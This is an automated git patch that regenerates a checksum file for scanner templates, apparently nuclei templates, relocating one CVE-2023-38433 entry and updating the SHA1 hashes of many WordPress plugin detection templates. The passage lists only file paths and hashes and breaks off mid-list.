http/cves/2023/CVE-2023-39361.yaml http/cves/2023/CVE-2023-4634.yaml http/exposed-panels/aspcms-backend-panel.yaml From c4206ba14085e538530f2e0a4b5250f2c70ba70b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 14:40:18 +0000 Subject: [PATCH 0268/1090] Auto Generated Templates Checksum [Sun Sep 10 14:40:18 UTC 2023] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 83282dfe1b..4e42d38388 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -620,7 +620,6 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a5c13b905ce766747d75254fb82d122c8bbbe70d http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e -http/cve/2023/CVE-2023-38433.yaml:056c61cbe4efba6f865ba3410d5b0e9d43f88d0e http/cves/2000/CVE-2000-0114.yaml:fcd8e8015db69aaba7323d20ef4834bd34fd4346 http/cves/2001/CVE-2001-0537.yaml:f828a1bb3fb196d8fbc7c6cb30d44af702685156 http/cves/2002/CVE-2002-1131.yaml:12ad891bdc82a3f86d726abb8f60634c7ee66a98 @@ -2627,6 +2626,7 @@ http/cves/2023/CVE-2023-3765.yaml:5399e0d266ee8b789e41ad6d68aea0fd0c0612ec http/cves/2023/CVE-2023-38035.yaml:0dc31fc8d3d44bb3ea07680f340141cfefbbba37 http/cves/2023/CVE-2023-38205.yaml:5a8c9cef0b1f746046eb0576c605535003f0a279 http/cves/2023/CVE-2023-3836.yaml:f9c2a0f31ec00a1b0fb80f52ea3c8c64431a9a93 +http/cves/2023/CVE-2023-38433.yaml:056c61cbe4efba6f865ba3410d5b0e9d43f88d0e http/cves/2023/CVE-2023-38646.yaml:1e7881d442110d693aa5733d8fdac5b66fd2a328 http/cves/2023/CVE-2023-39026.yaml:d7a2463950015e1f3951c74e245b0298a0168c05 http/cves/2023/CVE-2023-39120.yaml:c2e5b3bd997e2b6cb63530cc9c7bf1d0cce6e0b7 @@ -5811,218 +5811,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a 